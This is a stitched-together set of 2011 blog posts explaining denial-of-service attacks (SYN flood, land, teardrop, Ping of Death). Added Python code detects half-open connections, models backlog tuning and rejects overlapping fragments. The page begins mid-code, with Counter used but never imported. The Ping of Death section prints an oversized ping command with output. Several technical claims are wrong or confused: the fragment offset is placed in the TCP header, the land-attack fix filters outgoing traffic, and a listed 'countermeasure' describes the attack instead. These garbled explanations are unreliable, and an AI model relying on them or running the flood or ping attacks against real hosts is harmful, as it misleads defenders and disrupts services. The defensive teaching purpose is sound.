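# Names netstat uses for a half-open connection (Windows, Linux, BSD).
HALF_OPEN = {"SYN_RECEIVED", "SYN_RECV", "SYN_RCVD"}

# Constructed `netstat -an` output; all addresses are documentation ranges.
SAMPLE = """\
Active Connections
  Proto  Local Address      Foreign Address        State
  TCP    0.0.0.0:80         0.0.0.0:0              LISTENING
  TCP    192.0.2.10:80      198.51.100.7:40112     SYN_RECEIVED
  TCP    192.0.2.10:80      198.51.100.21:1029     SYN_RECEIVED
  TCP    192.0.2.10:80      203.0.113.5:52100      SYN_RECEIVED
  TCP    192.0.2.10:80      203.0.113.77:6001      SYN_RECEIVED
  TCP    192.0.2.10:80      198.51.100.130:3321    SYN_RECEIVED
  TCP    192.0.2.10:80      203.0.113.200:44100    SYN_RECEIVED
  TCP    192.0.2.10:80      192.0.2.55:50211       ESTABLISHED
  TCP    192.0.2.10:443     192.0.2.56:50300       ESTABLISHED
  TCP    192.0.2.10:443     192.0.2.57:50301       ESTABLISHED
  TCP    192.0.2.10:443     192.0.2.58:50302       SYN_RECEIVED
  UDP    0.0.0.0:53         *:*
"""

def parse_tcp_rows(text):
    """Yield (local_port, remote_host, state) for each TCP row."""
    for line in text.splitlines():
        parts = line.split()
        if parts and parts[-1].isdigit():   # drop a trailing PID column
            parts = parts[:-1]
        if len(parts) < 4 or not parts[0].lower().startswith("tcp"):
            continue                        # headers, UDP rows, blank lines
        local, remote, state = parts[-3:]
        yield local.rsplit(":", 1)[-1], remote.rsplit(":", 1)[0], state.upper()

def half_open_report(text, min_count=5, min_share=0.5):
    """Per local port: half-open count, total connections, distinct remote
    hosts, and a 'suspect' flag when half-open entries dominate the port."""
    half, total, sources = Counter(), Counter(), {}
    for port, remote, state in parse_tcp_rows(text):
        if state.startswith("LISTEN"):
            continue                        # listening sockets are not connections
        total[port] += 1
        if state in HALF_OPEN:
            half[port] += 1
            sources.setdefault(port, set()).add(remote)
    return {port: {"half_open": n,
                   "total": total[port],
                   "distinct_sources": len(sources[port]),
                   "suspect": n >= min_count and n / total[port] >= min_share}
            for port, n in half.items()}
```

A single half-open entry is normal on a busy server; what the report looks for is one port on which half-open entries are both numerous and the majority.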

NOTE :- SYN packets are used in conjunction with half-open connections for stealth port scanning, also called half-open port scanning. For more details, read "Port Scanning".

Countermeasure

There is no single countermeasure you can take to protect your system against SYN-flood attacks. There are, however, certain steps you can take to minimize the risk of damage caused by such attacks:

  • Reduce the duration of time required for a connection to time out. This will ensure that if numerous spoofed connection requests are sent to the target system, these requests will be discarded more quickly, thus minimizing memory consumption and thereby mitigating the risk of such attacks. Although this will minimize the hogging of system resources, it is not a very good countermeasure against SYN attacks because sometimes even legitimate users might be disconnected by the target system.
  • Increase the number of connection requests that can be accepted by the host at one time. One downside to this is that more memory and system resources will be consumed. 
  • Install vendor-specific updates and patches. Whenever a new type of attack becomes prevalent on the Internet, each vendor usually comes out with its own version of a countermeasure for its software. For this reason, it is sometimes a good idea to turn to the company whose software you have installed on your system for a countermeasure to a particular type of an attack.
  • Use a firewall. They detect SYN attacks, respond with fake replies, and try to trace the spoofed source address to the actual attacker. It is also important to ensure that the firewall has been updated. For more details, read TCP SYN Flooding and IP Spoofing Attacks.
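The trade-off in the first two countermeasures can be seen in a small model of the half-open connection queue. This is an added example, not code from the original post; the backlog sizes, timeouts and request rates are illustrative assumptions, and the function names are hypothetical.

```python
from collections import deque

def legit_success_rate(backlog, timeout_s, spoofed_per_s, seconds=300):
    """Fraction of legitimate clients (one per second) that find a free slot.

    Model assumptions: a spoofed request never completes the handshake and
    holds its slot until timeout_s has passed; a legitimate client completes
    at once, so it only needs one free slot at the moment its SYN arrives.
    """
    half_open = deque()      # arrival time of each pending entry, oldest first
    served = 0
    for now in range(seconds):
        while half_open and now - half_open[0] >= timeout_s:
            half_open.popleft()              # timed-out entries are discarded
        for _ in range(spoofed_per_s):
            if len(half_open) < backlog:
                half_open.append(now)        # slot is held until it times out
        if len(half_open) < backlog:
            served += 1                      # the legitimate SYN got a slot
    return served / seconds

def compare_settings(spoofed_per_s=10):
    """Run one baseline and the two tuned settings against the same load."""
    settings = {
        "baseline (backlog 128, timeout 75 s)": (128, 75),
        "shorter timeout (backlog 128, timeout 5 s)": (128, 5),
        "larger backlog (backlog 1024, timeout 75 s)": (1024, 75),
    }
    return {name: legit_success_rate(size, timeout, spoofed_per_s)
            for name, (size, timeout) in settings.items()}
```

In this model either setting keeps the service reachable only while the request rate multiplied by the timeout stays below the backlog size, which is why the list above treats both as risk reduction rather than a fix.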

























Friday, May 13, 2011

Land Attacks

A land attack is similar to a SYN attack, the only difference  being that instead of including an invalid IP address, the SYN packets include the IP address of the target system itself. More specifically, the source IP address and port number are identical to the destination IP address and port number. As a result, an infinite loop is created within the target system, which ultimately hangs and crashes.

Countermeasure :- The easiest way to protect your system against land attacks is to install a firewall or filtering utility that filters out outgoing packets whose destination IP address is the same as the IP address of the local system.



Wednesday, May 11, 2011

SYN/ACK Packets

To gain a better understanding of SYN and ACK packets, read the following:
  • ACK. TCP/IP demands that both the source and destination systems transmit and receive acknowledgement messages to confirm the safe and proper transfer of data. These acknowledgement messages are known as ACK messages or ACK packets. For example, suppose there are two systems, A and B, and that A sends the first (X1) of a series of packets to B. A will not send the second packet in the series (X2) to B until B acknowledges that it received the first packet (ACK X1). If A does not receive an ACK message, then a time-out occurs, and A will resend the data to B.
  • SYN. A SYN packet is nothing but a normal TCP packet with the synchronize (SYN) flag switched on. This flag indicates that the sender wants to establish a three-way TCP/IP connection with the destination system.

SYN-Flood Attacks

This post focuses on one of the most common and easiest to execute DOS attacks, known as SYN flooding. The idea behind SYN flooding is to flood the target system with connection requests from spoofed source addresses. As the target system tries to establish full connections with all these requests, its memory is hogged. As a result, the target system is unable to provide services to legitimate users or clients.

To further clarify, suppose you have a single telephone connection with 10 parallel lines, that is, 10 lines with the same telephone number. If you use 10 different telephones to simultaneously dial this number, then all 10 parallel lines of the target connection will be used to answer your 10 calls. Even if a legitimate client is trying to call the number (which is under attack by you), he will not be able to get through. SYN flooding is like this, but even better; in the case of SYN flooding, the "calls" are made from a spoofed source address, making it difficult (but not impossible) to trace.


How It Works
SYN flooding works by exploiting the three-way handshake that occurs any time two systems across the network initiate a TCP/IP connection. Here's what happens in a typical three-way handshake:

  1. The source system (client) sends a SYN packet to the destination system (host).
  2. The destination system replies with a SYN packet and acknowledges the source system's SYN packet by sending an ACK packet.
  3. The source system sends an ACK packet to acknowledge the SYN/ACK packet sent by the host.

Only when these three steps are completed is a TCP/IP connection established between the source system and the host.




In a SYN-flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with a SYN/ACK packet, but because the source IP address in the original SYN packet is invalid, these SYN/ACK packets are simply sent into the void. Even so, the target host waits in vain for an ACK message from the source system, and as it does, additional requests with invalid IP addresses queue up behind the original ones, and the whole cycle starts again. Eventually, due to the large number of connection requests, the target system's memory is consumed, and that system is therefore unable to cater to requests for information made by legitimate users.

In accordance with the rules of TCP/IP, the system will time out after a certain period of time has passed. When this happens, the connection requests queued up on the target system are discarded, thereby freeing a large part of the hogged-up memory. In a typical SYN-flood attack, however, the attacker sends connection requests from spoofed addresses more quickly than the earlier connection requests can be timed out. Because the attacker continuously sends more and more connection requests, the target system's memory is continuously consumed.

Countermeasure  1 :- In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.
Countermeasure  2 :- SYN flooding is commonly used in the process of IP spoofing. IP spoofing is discussed later in this chapter in the section titled  "IP spoofing Attacks"








Monday, May 9, 2011

Teardrop Attacks

Whenever data is sent over the Internet, it is broken into fragments at the source system and reassembled at the destination system. For example, suppose you need to send 4,000 bytes of data from one system to another. Rather than sending the entire chunk in a single packet, the data is broken down into smaller packets, each packet carrying a specified range of data like so:

  • Packet 1 will carry bytes 1-1500.
  • Packet 2 will carry bytes 1501-3000.
  • Packet 3 will carry bytes 3001-4000.

Each packet has an Offset field in its TCP header part that specifies the range of data (that is, the specific bytes of data) being carried by that particular data packet. This, along with the value in the Sequence Number field, helps the destination system reassemble the data packets in the correct order.

In a teardrop attack, a series of data packets is sent to the target system with overlapping Offset field values. As a result, the target system cannot reassemble the packets and is forced to crash, hang, or reboot.

Still not quite clear on how this works? Let's examine how a system receives data packets under normal circumstances. (Note that the underscore character ( _ ) equals one data packet.) As you can see here, no bytes overlap between packets:

- - - - - - - - - - - -
(Bytes 1-1500) (Bytes 1501-3000) (Bytes 3001-4500)

In a teardrop attack, however, the data packets sent to the target computer contain bytes that overlap with each other:

- - - - - - - - - - - - -
(Bytes 1-1500) (Bytes 1501-3000) (Bytes 1001-3600)

When the target system receives a series of packets like the one shown here, it cannot reassemble the data and, therefore, will crash, hang or reboot.

Countermeasure :-  To protect your system from teardrop attacks, make sure you have the latest patches from your vendor, For more information about these types of attacks and the countermeasures you can take.
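What a patched system does differently is validate the byte ranges before reassembling. The following is an added example, not code from the original post: it works on whole byte ranges numbered from 1, as the post does, rather than on real header fields, it assumes the complete set of fragments has arrived, and the names `inspect_fragments`, `reassemble` and `frag` are hypothetical.

```python
def inspect_fragments(fragments):
    """fragments: (first_byte, payload) pairs, first_byte counted from 1 as
    in the ranges above. Returns the overlapping and the missing byte ranges."""
    overlaps, gaps = [], []
    covered_to = 0                               # highest byte held so far
    for first, payload in sorted(fragments, key=lambda f: f[0]):
        if first < 1 or not payload:
            raise ValueError(f"malformed fragment starting at byte {first}")
        last = first + len(payload) - 1
        if first <= covered_to:                  # re-supplies bytes already held
            overlaps.append((first, min(last, covered_to)))
        elif first > covered_to + 1:             # hole before this fragment
            gaps.append((covered_to + 1, first - 1))
        covered_to = max(covered_to, last)
    return {"overlaps": overlaps, "gaps": gaps, "length": covered_to}

def reassemble(fragments):
    """Return the reassembled bytes, or raise instead of guessing when the
    fragment set overlaps or has holes (the whole datagram is discarded)."""
    report = inspect_fragments(fragments)
    if report["overlaps"]:
        raise ValueError(f"overlapping fragments: {report['overlaps']}")
    if report["gaps"]:
        raise ValueError(f"missing bytes: {report['gaps']}")
    return b"".join(p for _, p in sorted(fragments, key=lambda f: f[0]))

def frag(first, last, fill):
    """Build a constructed test fragment covering bytes first..last."""
    return (first, bytes([fill]) * (last - first + 1))

# The two constructed fragment sets from the diagrams above.
NORMAL = [frag(1, 1500, 0x41), frag(1501, 3000, 0x42), frag(3001, 4500, 0x43)]
TEARDROP = [frag(1, 1500, 0x41), frag(1501, 3000, 0x42), frag(1001, 3600, 0x43)]
```

For the teardrop set the check reports bytes 1001-1500 and 1501-3000 as supplied twice and refuses to reassemble, while the normal set is accepted in any arrival order.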















Sunday, May 8, 2011

Ping of Death

The ping command makes use of the ICMP echo request and echo reply messages and is commonly used to determine whether the remote host is alive. In a Ping of Death attack, however, ping causes the remote system to hang, reboot, or crash. To do so, the attacker uses the ping command in conjunction with the -l argument (used to specify the size of the packet sent) to ping the target system with a data packet that exceeds the maximum bytes allowed by TCP/IP (65,536). For example, the following ping command creates a giant datagram  that is 65,540 bytes in size (the output follows):

C:\windows>ping -l 65540 hostname
Pinging hostname [xx.yy.tt.pp] with 65,540 bytes of data:

Reply from 203.94.243.71: bytes = 65540 time = 134ms TTL = 61
Reply from 203.94.243.71: bytes = 65540 time = 134ms TTL = 61
Reply from 203.94.243.71: bytes = 65540 time = 134ms TTL = 61
Reply from 203.94.243.71: bytes = 65540 time = 134ms TTL = 61

Countermeasure :- Fortunately, nearly all systems these days are not vulnerable to the Ping of Death. Unless you are running an ancient system with an equally ancient operating system, you are almost sure to be protected from this type of DOS attack. To make sure that your software is patched, however, visit your vendor's Web site and check.




Saturday, May 7, 2011

DOS attacks

A denial of service (DOS) attack is an attack that clogs up so much memory on the target system that it cannot serve its users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users. These days, DOS attacks are very common; indeed, just about every server is bound to experience such an attack at some time or another.
There are several different kinds of DOS attacks, the most popular of which are as follows:







What is hacking?

A hacker is often someone who creates and modifies computer software and computer hardware, including computer programming, administration, and security-related items. In computer security, a hacker is usually someone who works with the security mechanisms for computer and network systems to strengthen them; the term is more often used incorrectly, especially in the mass media, to refer to those who seek access despite them.

 
